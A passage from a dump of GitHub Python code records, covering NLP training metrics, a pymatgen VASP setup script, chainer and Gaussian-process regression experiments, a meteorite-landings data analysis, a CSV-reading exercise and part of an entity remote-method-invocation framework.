MaskedAccuracy(Metric):\n \"\"\"Computes accuracy with support for masked indicies.\n\n Adds metric state variables:\n correct (float): The number of instances where the prediction masked the target.\n total (float): The number of total instances that were predicted.\n\n Args:\n ignore_index (int): The class index to ignore.\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. Default: ``False``.\n \"\"\"\n\n def __init__(self, ignore_index: int, dist_sync_on_step: bool = False):\n # state from multiple processes\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n self.ignore_index = ignore_index\n\n self.add_state(\"correct\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n self.add_state(\"total\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, preds: torch.Tensor, target: torch.Tensor):\n # predictions is a batch x num_classes tensor, take the argmax to get class indicies\n preds = torch.argmax(preds, dim=-1)\n assert preds.shape == target.shape\n\n # mask out the padded indicies\n mask = (target != self.ignore_index)\n masked_target = target[mask]\n masked_preds = preds[mask]\n\n self.correct += torch.sum(masked_preds == masked_target)\n self.total += mask.sum()\n\n def compute(self):\n assert isinstance(self.correct, Tensor)\n assert isinstance(self.total, Tensor)\n return self.correct.float() / self.total\n\n\nclass LanguageCrossEntropy(Metric):\n \"\"\"Torchmetric that computes cross entropy on language modeling outputs.\n\n Adds metric state variables:\n sum_loss (float): The sum of the per-example loss in the batch.\n total_items (float): The number of batches to average across.\n\n Args:\n vocab_size (int): The size of the tokenizer vocabulary.\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. Default: ``False``.\n ignore_index (int, optional): The class index to ignore. Default: ``-100``.\n \"\"\"\n\n def __init__(self, vocab_size: int, dist_sync_on_step=False, ignore_index: int = -100):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n\n self.vocab_size = vocab_size\n self.ignore_index = ignore_index\n self.loss_fn = torch.nn.CrossEntropyLoss(ignore_index=ignore_index, reduction=\"sum\")\n self.add_state(\"sum_loss\", default=torch.tensor(0.), dist_reduce_fx=\"sum\")\n self.add_state(\"total_items\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, output: Union[Mapping, Tensor], target: Tensor) -> None:\n \"\"\"Updates the internal state with results from a new batch.\n\n Args:\n output (Mapping): The output from the model, which must contain\n either the Tensor or a Mapping type that contains the loss or model logits.\n target (~torch.Tensor): A Tensor of ground-truth values to compare against.\n \"\"\"\n\n assert isinstance(output, Tensor)\n output = output.view(-1, self.vocab_size)\n target = target.view(-1)\n losses = self.loss_fn(output, target)\n\n total_items = (target != self.ignore_index).sum()\n self.total_items += total_items #type: ignore (third-party)\n\n # accmulate loss over all batches\n self.sum_loss += losses\n\n def compute(self) -> Tensor:\n \"\"\"Aggregate the state over all processes to compute the metric.\n\n Returns:\n loss: The loss averaged across all batches as a :class:`~torch.Tensor`.\n \"\"\"\n # Return average loss over entire dataset\n return self.sum_loss / self.total_items #type: ignore (third-party)\n\n\nclass BinaryF1Score(Metric):\n \"\"\"Implements F1 Scores for binary classification tasks via sklearn.\n\n Adds metric state variables:\n true_positive (float): A counter of how many items were correctly classified as positives.\n false_positive (float): A counter of how many items were incorrectly classified as positives.\n false_negative (float): A counter of how many items were incorrectly classified as negatives.\n\n Args:\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. Default: ``False``.\n \"\"\"\n\n def __init__(self, dist_sync_on_step: bool = False):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n\n self.add_state(\"true_positive\", default=torch.tensor(0.), dist_reduce_fx=\"sum\")\n self.add_state(\"false_positive\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n self.add_state(\"false_negative\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, output: Tensor, target: Tensor) -> None:\n \"\"\"Updates the internal state with results from a new batch.\n\n Args:\n output (Mapping): The output from the model, which must contain\n either the Tensor or a Mapping type that contains the loss or model logits.\n target (~torch.Tensor): A Tensor of ground-truth values to compare against.\n \"\"\"\n predictions = torch.argmax(output, dim=1)\n self.true_positive += predictions[(target == 1)].sum()\n self.false_positive += (predictions[(target == 1)] == 0).sum()\n self.false_negative += (predictions[(target == 0)] == 1).sum()\n\n def compute(self) -> Tensor:\n \"\"\"Aggregate the state over all processes to compute the metric.\n\n Returns:\n loss: The loss averaged across all batches as a :class:`~torch.Tensor`.\n \"\"\"\n assert isinstance(self.true_positive, Tensor)\n assert isinstance(self.false_positive, Tensor)\n assert isinstance(self.false_negative, Tensor)\n f1 = (self.true_positive) / (self.true_positive + (0.5 * (self.false_negative + self.false_positive)))\n return f1\n\n\nclass HFCrossEntropy(Metric):\n \"\"\"Hugging Face compatible cross entropy loss.\n\n Adds metric state variables:\n sum_loss (float): The sum of the per-example loss in the batch.\n total_batches (float): The number of batches to average across.\n\n Args:\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. Default: ``False``\n \"\"\"\n\n def __init__(self, dist_sync_on_step=False):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n\n self.add_state(\"sum_loss\", default=torch.tensor(0.), dist_reduce_fx=\"sum\")\n self.add_state(\"total_batches\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, output: Union[Mapping, Tensor], target: Tensor) -> None:\n \"\"\"Updates the internal state with results from a new batch.\n\n Args:\n output (Mapping): The output from the model, which must contain\n either the Tensor or a Mapping type that contains the loss or model logits.\n target (~torch.Tensor): A Tensor of ground-truth values to compare against.\n \"\"\"\n\n # if logit modification algorithms aren't on, we take the loss directly from the model output\n if isinstance(output, Mapping) and 'loss' in output:\n loss = output['loss']\n else:\n if isinstance(output, Mapping):\n logits = output['logits']\n # recompute the loss on our own\n elif isinstance(output, Tensor):\n logits = output\n else:\n raise Exception(f\"Type {type(output)} for the output is unsupported.\")\n\n loss = soft_cross_entropy(logits, target)\n\n # accmulate loss over all batches\n self.sum_loss += loss\n\n self.total_batches += 1 #type: ignore (third-party)\n\n def compute(self) -> Tensor:\n \"\"\"Aggregate the state over all processes to compute the metric.\n\n Returns:\n loss: The loss averaged across all batches as a :class:`~torch.Tensor`.\n \"\"\"\n # Return average loss over entire dataset\n return self.sum_loss / self.total_batches #type: ignore (third-party)\n\n\nclass Perplexity(HFCrossEntropy):\n \"\"\"Subclasses :class:`~composer.models.nlp_metrics.HFLanguageCrossEntropyLoss` to implement perplexity.\n\n If an algorithm modifies the loss function and it is no longer directly provided in the output, then this could be\n expensive because it'll compute the loss twice.\n \"\"\"\n\n def compute(self) -> Tensor:\n \"\"\"Returns torch.exp() of the LanguageCrossEntropyLoss.\"\"\"\n avg_loss = super().compute()\n return torch.exp(avg_loss)\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/metrics/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":9060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35993360665","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a script to set up relaxations using Materials Project parameters.\n\"\"\"\n\nimport argparse\nfrom pymatgen import Structure\nfrom pymatgen.io.vasp.sets import MPRelaxSet\n\ndef setup_vasp(pmg_s, n_e):\n \"\"\"\n :param pmg_s: Pymatgen Structure object\n :param n_e: Number of electrons to add\n :return: A VaspSet\n \"\"\"\n nelect = MPRelaxSet(pmg_s).nelect\n if n_e > 0:\n print(\"###################################\")\n print(\"# BE CAREFUL, YOU ADDED ELECTRONS #\")\n print(\"###################################\")\n nelect += n_e\n uis = {\n 'NELECT': nelect,\n # 'IVDW': 11\n }\n\n return MPRelaxSet(pmg_s, user_incar_settings=uis)\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n # Process command line arguments\n psr = argparse.ArgumentParser(description=\"MP relax setup script\")\n psr.add_argument('-s', type=str, default=\"./POSCAR\", help='Structure file')\n psr.add_argument('-ne', type=int, default=0, help='# of electrons to add')\n psr.add_argument('-fn', type=str, default=None, help='Folder name for run')\n args = psr.parse_args()\n\n # Get the structure object\n init_s = Structure.from_file(args.s)\n\n # Get the foldername\n foldername = \"./\"\n if args.fn is None:\n foldername += str(init_s.composition).replace(\" \", \"\") + \"_relax\"\n else:\n foldername += args.fn\n\n mitset = setup_vasp(init_s, args.ne)\n mitset.write_input(foldername)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dchannah/materials_mining","sub_path":"basic_setup/setup_mp_relax.py","file_name":"setup_mp_relax.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"16183514761","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 12 18:00:35 2017\r\n\r\n@author: Stefano\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport chainer\r\nfrom chainer import report, optimizers, Link, Chain\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\nfrom chainer.datasets import TupleDataset\r\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\r\nfrom chainer import datasets, iterators, optimizers, serializers\r\nfrom chainer import Link, Chain, ChainList\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\nfrom chainer.training import extensions\r\n\r\n\r\ndef create_data(n=2):\r\n\r\n X = np.random.rand(n,1).astype('float32')\r\n X = X\r\n T = np.sum(np.hstack((X[0:-1],X[1:])),axis=1)\r\n T = np.hstack([0, T[0:]]).astype('float32')\r\n T = T.reshape([n,1])\r\n\r\n return TupleDataset(X, T)\r\n\r\ndata=create_data()\r\n\r\nclass MyRegressor(chainer.Chain):\r\n def __init__(self, predictor):\r\n super(MyRegressor, self).__init__(predictor=predictor)\r\n\r\n def __call__(self, x, y):\r\n # This chain just computes the mean absolute and squared\r\n # errors between the prediction and y.\r\n pred = self.predictor(x)\r\n abs_error = np.absolute(pred - y) \r\n loss = F.mean_squared_error(pred, y)\r\n\r\n # Report the mean absolute and squared errors.\r\n report({'abs_error': abs_error, 'squared_error': loss}, self)\r\n\r\n return loss\r\n\r\n \r\n\r\nclass RNN(Chain):\r\n def __init__(self):\r\n super(RNN, self).__init__()\r\n with self.init_scope():\r\n self.mid = L.Linear(None, 100) # the first LSTM layer\r\n self.out = L.Linear(100, 1) # the feed-forward output layer\r\n\r\n\r\n def __call__(self, cur_word):\r\n # Given the current word ID, predict the next word.\r\n h = self.mid(cur_word)\r\n y = self.out(h)\r\n return y\r\n\r\nrnn = RNN()\r\nmodel = MyRegressor(rnn)\r\naccfun=F.accuracy\r\noptimizer = optimizers.SGD()\r\noptimizer.setup(model)\r\n\r\n\r\ndef compute_loss(data):\r\n loss = 0\r\n for inputt, outputt in zip(data._datasets[0], data._datasets[1]):\r\n inputt=data._datasets[0].reshape([1,2]).astype('float32')\r\n outputt=data._datasets[1][1].reshape([1,1]).astype('float32')\r\n loss = model(inputt, outputt)\r\n return loss\r\n\r\n\r\n# \"epoch\" iteration here\r\nepochs=100\r\n\r\nfor i in range(1, epochs):\r\n \r\n data=create_data()\r\n model.cleargrads()\r\n loss = compute_loss(data)\r\n loss.backward()\r\n optimizer.update()\r\n expected=data._datasets[1][(data._datasets[1]).size-1] # takes last value of t\r\n lastinput=data._datasets[0] #takes last value of x\r\n predicted=rnn(lastinput.reshape([1,2]))\r\n accuracy = predicted-expected # we want accuracy close to zero because percentages are difficult to calculate URRDURR\r\n print (loss,accuracy) \r\n","repo_name":"Stef0/neural-networks-class-projects","sub_path":"chainer LSTM.py","file_name":"chainer LSTM.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26721213226","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF, WhiteKernel\nfrom my_gpr import gaussian_regressor\n\n\ndef target_generator(X, add_noise=False):\n target = 0.5 + np.sin(3 * X)\n if add_noise:\n rng = np.random.RandomState(1)\n target += rng.normal(0, 0.3, size=target.shape)\n return target.squeeze()\n\n\n# %%\n# Let's have a look to the target generator where we will not add any noise to\n# observe the signal that we would like to predict.\nX_real = np.linspace(0, 5, num=30).reshape(-1, 1)\ny_real = target_generator(X_real, add_noise=False)\n\nrng = np.random.RandomState(0)\nX_train = rng.uniform(0, 5, size=20).reshape(-1, 1)\ny_train = target_generator(X_train, add_noise=True)\n\nplt.plot(X_real, y_real, label=\"Expected signal\")\nplt.scatter(\n x=X_train[:, 0],\n y=y_train,\n color=\"black\",\n alpha=0.4,\n label=\"Observations\",\n)\nplt.legend()\nplt.xlabel(\"X\")\n_ = plt.ylabel(\"y\")\nplt.show()\n\nfig, axes = plt.subplots(nrows=1, ncols=1, squeeze=False)\n\nkernelParameter_sigma = 1\nkernelParameter_l = 1.e-1\nnoise_level = 1e-2\n\nmu = []\nvar = []\n\nfor i in range(2):\n ax = axes[0, 0]\n\n if i == 0:\n kernel = kernelParameter_sigma * RBF(length_scale=kernelParameter_l,\n length_scale_bounds=(1e-2, 1e3)) + WhiteKernel(\n noise_level=noise_level, noise_level_bounds=(1e-10, 1e1)\n )\n gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0)\n gpr.fit(X_train, y_train)\n y_mean, y_std = gpr.predict(X_real, return_std=True)\n\n else:\n gpr = gaussian_regressor(kernelParameter_l=kernelParameter_l,\n kernelParameter_sigma=kernelParameter_sigma,\n noise_level=noise_level)\n gpr.fit(X_train, y_train)\n y_mean, y_std = gpr.predict(X_real)\n mu.append(y_mean)\n var.append(y_std)\n\n # Plotting\n if i == 0:\n ax.plot(X_real, y_real, label=r\"$f(x) = x \\sin(x)$\", linestyle=\"dotted\")\n ax.scatter(X_train, y_train, label=\"Observations\")\n ax.plot(X_real, y_mean, label=\"Mean prediction\")\n # ax.fill_between(\n # X_real.ravel(),\n # y_mean - 1.96 * y_std,\n # y_mean + 1.96 * y_std,\n # alpha=0.5,\n # label=r\"95% confidence interval\",\n # )\n ax.legend()\n ax.set_xlabel(\"$x$\")\n ax.set_ylabel(\"$f(x)$\")\n ax.set_title(\"Gaussian process regression on noise-free dataset\")\nfig.show()\na = 0\n","repo_name":"mdallaquaXOM/HGOR","sub_path":"Learning/my_test.py","file_name":"my_test.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24084195464","text":"# Ejercicio informe.py N°2.15\n\nimport csv\n\ndef leer_camion(nombre_archivo):\n '''Lee los nombres, cantidad de cajones y precios de frutas y verduras de un archivo y guarda cada fila\n de información como una tupla dentro de una lista (camion)'''\n camion = []\n\n with open(nombre_archivo, 'rt') as archivo:\n filas = csv.reader(archivo)\n encabezado = next(filas)\n for posicion, fila in enumerate(filas):\n record = dict(zip(encabezado, fila))\n try:\n lote = (record['nombre'], int(record['cajones']), float(record['precio']))\n camion.append(lote)\n except ValueError:\n print('Faltan datos en la línea', posicion, 'del archivo.')\n return camion\n\ncamion = leer_camion('../../../Data/camion.csv')\nprint(camion)\n\nfecha_camion = leer_camion('../../../Data/fecha_camion.csv')\nprint(fecha_camion)","repo_name":"LenaSofia/Programacion_en_Python_UNSAM","sub_path":"Notas/03_Datos/ejercicios/secuencias/informe.py","file_name":"informe.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"es","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"26190946868","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # ***Premise***\n# ---\n# ---\n\n# In[ ]:\n\n\n\n\n\n# # ***Questions***\n# ---\n# ---\n\n# + **Easy**\n# + Which year had the most meteors?\n# - _2013_\n# + What is the average mass of a meteors we've observed?\n# + **Hard**\n# + Are there more meteors around the equator or the poles?\n# + What time of year got the most asteroids? (Noticable trends in year data)\n# + **Other**\n# + How many meteors fell in important years (birth year(1995), Y2K, 2008(Obama), 2020(Now))?\n# \n\n# # ***Concepts to cover***\n# ---\n# ---\n\n# - [x] Histograms\n# - [ ] PDF\n# - [ ] CDF\n# - [ ] Hypothesis Testing\n# - [ ] Confidence Interval\n# - [ ] Correlation\n# - [ ] Outliers\n# - [ ] Normal Distribution\n# - [ ] Time Analysis\n\n# # ***Imports***\n# ---\n# ---\n\n# In[11]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom scipy import stats\nimport plotly.express as px\nfrom geopy.geocoders import Nominatim\nimport geopy as gp\nfrom datetime import datetime\n\n\n# # ***Data***\n# ---\n# ---\n\n# In[17]:\n\n\ndata = pd.read_csv('data/meteorite-landings.csv')\n# data = pd.read_csv('../data/Meteorite_Landings.csv')\nprint(data.columns)\n\ndata.head()\n\n\n# ## Basic Statistics\n\n# In[18]:\n\n\nprint(\"Data described: \\n\")\nprint(data.describe())\nprint('\\n')\nprint(\"Data info: \\n\")\nprint(data.info())\n\n\n# *Conclusions / Questions*\n# - There are missing values in mass, year, and locations\n# - Appropriate data types thus far\n\n# # ***Cleaning***\n# ---\n# ---\n# \n\n# ## Rename columns\n\n# In[19]:\n\n\ndata.rename(columns={'recclass':'class', 'reclat':'lat', 'reclong':'long', 'mass (g)':'mass'}, inplace=True)\ndata\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Outliers\n\n# In[20]:\n\n\nsns.boxplot(x=data['year'])\n\n\n# In[21]:\n\n\nfig, ax = plt.subplots(figsize=(16,8))\nax.scatter(data['year'], data['mass'])\n# ax.set_xlabel('Proportion of non-retail business acres per town')\n# ax.set_ylabel('Full-value property-tax rate per $10,000')\nplt.show()\n\n\n# # ***Statistical Plotting***\n# ---\n# ---\n\n# ## Fall vs Fallen Histogram\n\n# In[22]:\n\n\ndata['fall'].hist(bins=3) # \nplt.show()\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Equator or Poles\n\n# In[23]:\n\n\nplt.scatter(data.mass, data.lat)\n# print(data[data['lat']>0].count())\n# print(data[data['lat']<0].count())\naxes = plt.gca()\naxes.set_ylim([-90,90])\nabove_equator = data[data.lat >0].shape[0]\nat_equator = data[data.lat ==0].shape[0]\nbelow_equator = data[data.lat <0].shape[0]\nplt.show()\n\nprint(\"Above Equator:\", above_equator, '\\n')\nprint(\"At Equator:\", at_equator, '\\n')\nprint(\"Below Equator:\", below_equator, '\\n')\n\nlabels = [\"Above\", 'At', 'Below']\nvalues = [above_equator, at_equator, below_equator]\nplt.pie(values, labels=labels)\nplt.show()\n\n\n# *Conclusions / Questions*\n# - There are missig values because of the `Nan` values that I didn't remove. If I do remove then and replace them with 0, then it'ss alter results of values that actually are on the equator or prime meridian\n\n# ## Box Plot\n\n# *Conclusions / Questions*\n# - ...\n\n# ## PDF\n\n# In[10]:\n\n\nsns.distplot(data['year'].dropna(), hist=True, kde=True, bins=16)\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## CDF\n\n# In[24]:\n\n\nls_year = data['year'].dropna().values\n\ndef calculate_cdf(x, threshold):\n return np.sum(x <= threshold)\n\n# Create an array cdf_age where each value is the cdf of the age for each threshold\ncdf_year = [calculate_cdf(ls_year, r)/len(ls_year) for r in range(int(np.min(ls_year)), int(np.max(ls_year)))]\n\nplt.plot(range(int(np.min(ls_year)), int(np.max(ls_year))), cdf_year)\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Violin Plot\n\n# In[12]:\n\n\nsns.violinplot(x=\"year\", y=\"mass\", data=data)\n\n\n# *Conclusions / Questions*\n# - Why are the masses in the violin plot negative?\n\n# ## Correlation\n\n# In[13]:\n\n\nsns.heatmap(data.corr(), annot=True, cmap='coolwarm')\n\n\n# *Conclusions / Questions*\n# - Why are the masses in the violin plot negative?\n\n# # ***Various Plotting***\n# ---\n# ---\n\n# ## See the top 10 classification of meteors\n\n# In[14]:\n\n\ntop_10_class = data['class'].value_counts()[:10]\nplt.bar(top_10_class, height = 1)\n\ntop_10_class.plot(kind='bar')\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Lat and Long scatter plot, using mass as bubble size\n# - ***Latitude are y values (90 through -90)***\n# - ***Longitude are x values (-180 to 180)***\n\n# In[25]:\n\n\nplt.figure(figsize=(10,7))\nN = len(data['mass'])\narea = (30 * np.random.rand(N))**2 # 0 to 15 point radii\ncolors = np.random.rand(N)\nplt.scatter(data['long'], data['lat'], s=area, c=colors, alpha=0.2)\n\nplt.grid(True)\naxes = plt.gca()\naxes.set_xlim([-90,90])\naxes.set_ylim([-180,180])\nplt.show()\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Geolocation Function using geopy\n# \n\n# In[ ]:\n\n\n# geolocator = Nominatim(user_agent=\"project_impact\")\n# coor=gp.Point(data['lat'][1], data['long'][1])\n# location = geolocator.reverse(coor)\n# print(location.raw['address'].get('country'))\n\n\n# ## Geolocations loop\n\n# In[ ]:\n\n\n# lists = []\n# for i in range(20):\n# lats = data['lat'].get(key = i)\n# longs = data['long'].get(key = i)\n# coor = gp.Point(lats, longs)\n# country = geolocator.reverse(gp.Point(coor)).raw['address'].get('country')\n# lists.append(country)\n# print(lists)\n\n\n# ## Year Value Counts\n\n# In[16]:\n\n\nprint(data['year'].value_counts())\n# data['recclass'].value_counts().plot(kind='bar') # bar chart of the amount embarked passengers by class\n\n\n# ## Time Analysis\n\n# In[17]:\n\n\ndata['year'].fillna(0).astype(int)\n\n\n# *Conclusions / Questions*\n# - ...\n\n# In[18]:\n\n\nyear_count = data.groupby('year')['year'].count()\nplt.figure(figsize=(10,8))\nplt.plot(year_count)\nprint(\"Years describes: \", year_count.describe(), '\\n')\nprint(\"Confirming amount of unique year\", data.year.nunique(), '\\n')\nprint(\"Year with most recorded data:\", data.year.max())\nprint(\"Total span of year data: \", data.year.max()-data.year.min(), 'years\\n')\n# plt.hist(year_count)\n\n\n# *Conclusions / Questions*\n# - ...\n","repo_name":"RobotGyal/Project-Impact-v1","sub_path":"data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41197749437","text":"def partition(array,l,u):\n pivot = array[l]\n j=l\n for i in range(l+1,u+1):\n if array[i]\"\n return f\"\"\n\n def __init_subclass__(cls, **kwargs):\n cls.register_typename(cls.context_name, cls.__name__, cls)\n # s= os.path.abspath(sys.modules[cls.__module__].__file__)\n # if Globals.IsInGenerator:\n if getattr(cls, 'entity_type', None) != 'service':\n if cls.context_name.lower() != \"unknown\":\n cls.__modulepath__ = str(Path(os.getcwd()).parent.joinpath(\"Entities\").joinpath(cls.context_name).joinpath(cls.__name__ + \".py\"))\n\n\n cls.register_all_methods()\n cls.register_all_properties()\n # SymbolsRegistry().register_entity_type(cls)\n\n async def __ainit__(self, *args, **kwargs):\n await AsyncObj.__ainit__(self)\n self.pending_destroy = False\n self.timer_to_destroy = None\n self.subscribed_clients = list()\n self.subscribed_entities = set()\n self.properties_values = dict()\n self.internal_id = UNDEFINED_ID\n self.client = InvalidMailbox()\n self.timers: List[asyncio.TimerHandle] = list()\n if self.is_multicast:\n self.all_clients = MulticastMailbox(\"ue4\", self.__class__.__name__, remote_id=-1)\n self.all_clients_apps = MulticastMailbox(\"ue4\", \"UE4App\", remote_id=0)\n else:\n self.all_clients = InvalidMailbox()\n self.all_clients_apps = InvalidMailbox()\n EntitiesDispatcher().register_new(self)\n\n for prop_name, prop_meta in self.properties.items():\n if not issubclass(prop_meta.prop_type, Entity):\n default_value = prop_meta.prop_type.instantiate()\n setattr(self, prop_name, default_value)\n\n def get_client_interface(self):\n return self.all_clients if self.is_multicast else self.client\n\n async def __apostinit__(self):\n # await self.init_done()\n await self.begin_play()\n\n # async def init_done(self):\n # await self.begin_play()\n\n async def begin_play(self):\n pass\n\n def end_play(self):\n pass\n\n def destroy(self):\n if not self.pending_destroy:\n from traceback import print_stack\n #print_stack()\n INFO_MSG(f\"Entity {self.internal_id} pending destroy\")\n self.end_play()\n\n for client in self.subscribed_clients:\n if client:\n client.DestroyClientEntity(self.internal_id)\n\n EntitiesDispatcher().destroy_entity(self)\n\n self.pending_destroy = True\n\n for prop_name in self.properties.keys():\n delattr(self, prop_name)\n self.properties_values = dict()\n self.properties_locks = dict()\n\n [timer.cancel() for timer in self.timers]\n self.timers.clear()\n\n def call_later(self, func, secs):\n timer = call_later(func, secs)\n self.timers.append(timer)\n return timer\n\n def set_internal_id(self, internal_id):\n self.internal_id = internal_id\n if self.is_multicast:\n self.update_multicast_mailbox()\n\n def update_multicast_mailbox(self):\n self.all_clients.set_id(self.internal_id)\n\n def __isvalid__(self):\n return super().__isvalid__() and \\\n self.internal_id != UNDEFINED_ID\n\n T = TypeVar('T')\n @classmethod\n async def make_mailbox(cls: Type[T], context_name, entity_typename, endpoint_or_connection, *, remote_id=0) -> Union[T, Mailbox]:\n mailbox = await Mailbox(context_name, entity_typename, endpoint_or_connection, remote_id)\n return mailbox\n\n @classmethod\n async def mailbox_cast(cls, other_mailbox: Mailbox):\n mailbox = await Mailbox(other_mailbox.context_name,\n other_mailbox.entity_typename,\n None,\n other_mailbox.remote_id,\n (other_mailbox.client_connection, other_mailbox.endpoint))\n return mailbox\n\n\n @classmethod\n def register_rmi_method(cls, method):\n if not method.__name__ in cls.rmi_mapping:\n id = len(cls.rmi_methods)\n cls.rmi_methods[id] = method\n cls.rmi_mapping[method.__name__] = id\n return id\n\n @classmethod\n def register_all_methods(cls):\n cls.rmi_methods = dict(cls.rmi_methods)\n cls.rmi_mapping = dict(cls.rmi_mapping)\n methods_to_register = getattr(cls, 'methods_to_register', list())\n for method in methods_to_register:\n cls.register_rmi_method(method)\n\n @classmethod\n def get_annotations(cls):\n res = dict()\n for base in (cls.__bases__ + (cls,)):\n if hasattr(base, '__annotations__'):\n res.update(base.__annotations__)\n return res\n\n @classmethod\n def serializable_value(cls, *value):\n return 0\n\n @classmethod\n def register_property(cls, name, T, default):\n if isinstance(T, type) and issubclass(T, TypeBase):\n T = PropertyMetadata(T)\n if isinstance(T, PropertyMetadata):\n\n data = get_annotation_comment_and_line_by_source(cls, name, cls.__modulepath__)\n if data:\n comment, lnum = data\n T.set_comment(comment)\n T.set_line_number(lnum)\n T.set_source(cls.__modulepath__)\n\n if default is not None:\n T.set_has_default()\n\n if default is not None:\n T.set_default(T.prop_type.serializable_value(default))\n else:\n if issubclass(T.prop_type, Entity):\n T.set_default(None)\n else:\n T.set_default(T.prop_type.serializable_value())\n cls.properties[name] = T\n\n cls.create_property(name)\n\n @classmethod\n def register_all_properties(cls):\n cls.properties: Dict[str, PropertyMetadata] = dict(cls.properties)\n for key, value in cls.get_annotations().items():\n if isinstance(value, TypeBase) or isinstance(value, PropertyMetadata):\n default_value = getattr(cls, key, None)\n cls.register_property(key, value, default_value)\n if isinstance(value, int):\n value = [value]\n\n if isinstance(value, list):\n if DisplayThis in value:\n cls.display_attributes += key,\n\n @classmethod\n def create_property(cls, property_name):\n def setter(self, in_value):\n old = self.get_property_value(property_name)\n if old.is_transactional and not old.locked:\n raise ValueError(\"Only in transactions 'Transactional' properties can be changed\")\n T = old.__class__\n from Core.LocalDatatypes import int32\n if property_name == \"CityInstance\" and issubclass(T, int32):\n ERROR_MSG(\"OMG!\")\n db_interface = old.db_interface\n client_interface = old.client_interface\n try:\n in_value = T.instantiate(in_value)\n except TypeError:\n print('...')\n in_value.set_db_interface(db_interface)\n in_value.set_client_interface(client_interface)\n in_value.initialize_property(self, property_name)\n in_value._locked = old.locked\n if old.is_transactional:\n in_value.locker = old.locker\n self.set_property_value(property_name, in_value)\n if not in_value.locked:\n in_value.replicate()\n\n def getter(self):\n return self.get_property_value(property_name)\n\n def deleter(self):\n self.destroy_property()\n\n setattr(cls, property_name, property(getter, setter, deleter))\n\n def set_property_value(self, key, value):\n self.properties_values[key] = value\n\n def get_property_value(self, key):\n return self.properties_values.get(key, self.properties[key].default)\n\n @classmethod\n def get_method_by_id(cls, id):\n method = cls.rmi_methods.get(id, None)\n assert method is not None or error(\"Failed to get method by id %i\" % id)\n return method\n\n @classmethod\n def get_method_id(cls, method):\n for key, value in cls.rmi_methods:\n if value == method:\n return key\n else:\n return None\n\n async def execute_rmi(self, executor_connection, method_index, future_id, access_token, params_data):\n method = self.get_method_by_id(method_index)\n\n CALL_INFO_MSG(\"Call method %s\" % method)\n params, returns, defaults = method.rmi_signature\n\n serialized_params = BinarySerialization(params_data)\n args = list()\n data = serialized_params.get_data()\n\n if len(params) != len(data):\n raise SerializationError(f\"Signature mismatch: formal parameters count are not equals to serialized {method}, {executor_connection.endpoint}\")\n\n for param_index, (param_name, param_type) in enumerate(params):\n arg = param_type.deserialize(serialized_params.get_data()[param_index])\n if isinstance(arg, AsyncObj):\n arg = await arg\n args.append(arg)\n\n if CaptureConnection in method.rmi_specifiers['specifiers']:\n args = [executor_connection] + args\n\n if CaptureAccessToken in method.rmi_specifiers['specifiers']:\n args = [access_token] + args\n\n\n access_level = method.rmi_specifiers['kwspecifiers'].get('access', AccessLevel.Internal)\n if not Access().has_access(access_token, access_level):\n err = \"call to %s. Access denied!\" % method\n ERROR_MSG(err)\n self.send_error(executor_connection, err, future_id)\n return\n\n if hasattr(self, \"__rmi_firewall__\"):\n error_message = self.__rmi_firewall__(method)\n if error_message:\n err = \"call to forbidden method %s, reason:\" % (method, error_message)\n ERROR_MSG(err)\n self.send_error(executor_connection, err, future_id)\n return\n\n\n if not method.rmi_specifiers['isasyncmethod']:\n method(self, *args) # Call the method\n else:\n try:\n ret_data = await method(self, *args) # Call the async method\n except Exception as 